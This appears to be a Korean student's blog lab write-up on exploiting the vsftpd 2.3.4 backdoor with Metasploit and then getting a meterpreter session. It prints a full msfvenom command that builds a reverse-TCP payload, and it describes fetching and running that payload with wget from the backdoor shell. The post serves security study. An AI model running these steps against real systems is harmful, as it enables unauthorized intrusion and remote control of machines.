본문 바로가기
Security Project

19. vsftp 2.3.4 metasploit 백도어 쉘 권한 획득 및 meterpreter 연결

by 귀멸 2022. 9. 10.

16. Nessus를 이용한 내부 취약점 진단 결과,

vsftp 2.3.4 버전으로 서비스가 열려 있는 취약점이 발견되었다. 

이를 metasploit을 이용해 백도어 쉘 권한을 획득하고,

metapretor에 연결하는 실습을 진행한다.

아직 metasploit을 본격적으로 공부하지 않았기 때문에 중간중간 이해가 안 되는 부분들이

있지만 우선 따라가 본다.

 

백도어 쉘 권한을 획득했어도 거기서 사용할 수 있는 명령어라던지 서비스 업로드 등이

제한적이기 때문에 metapretor를 연결 시켜서 더 다양한 내부 침투를 위한 공격을 수행할 수 있도록 한다.

 


  1) vsftp 2.3.4 소켓 취약점을 이용한 백도어 쉘 권한 획득

      metasploit console을 실행하고, 

      DB에서 vsftp backdoor module을 찾아서 적용하고, RHOST(공격대상) IP를 입력 후 exploit 한다.


2) msfvenom으로 meterpreter 연결

    msfvenom =  msfpayload(백도어) + msfencode(백신 우회)

    먼저 -p 옵션으로 payload 셋업  

    ┌──(root㉿kali)-[/home/kali]
    └─# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5656 -f elf > back.elf

    

   ** payload란 화물 적재물이란 뜻인데 보안에서는 전송시키는 데이터 셋이다.

      다음 문장에서 의미를 생각해 볼 수 있다.

      어떠한 Exploit 행위(발견된 취약점을 공격하는 모든 행위)를 위해 공격코드를 payload한다.

 

   여기서 공격자 → 희생자로 payload 하는 것은 bind 공격

   반대로 희생자 → 공격자로 payload 하게끔 요청시키는 것을 reverse라고 한다.

   방화벽 우회 등의 문제로 보통의 공격은 주로 reverse 방식으로 구현된다.

 

   공격자의 웹서버를 열고 payload로 데이터 셋된 back.elf 파일을 웹서버 기본 폴더에 넣어 둔다.


 3) Handling (리버스 텔넷에 맞게 소켓을 열어주는 설정)

  아래와 같이 설정하고 대기

  1) 과정에서 획득한 백도어 쉘에서 back.elf를 wget으로 가져와서 권한 바꾸고 실행 

   대기하던 화면에 meterpreter가 연결된 것을 볼 수 있다.

연결된 meterpreter로 무엇을 할 수 있는지는 metasploit을 공부하면서 자세히 살펴본다.

 

 

'Security Project' 카테고리의 다른 글

21. Metasploit 추가 명령어 및 옵션  (0) 2022.09.13
20. Metasploit 기초  (0) 2022.09.12
18. NFS 서비스 remote mount 공격  (0) 2022.09.09
17. CVSS 위협 평가 이해  (0) 2022.09.09
16. Nessus 이용한 내부 취약점 진단  (1) 2022.09.07

댓글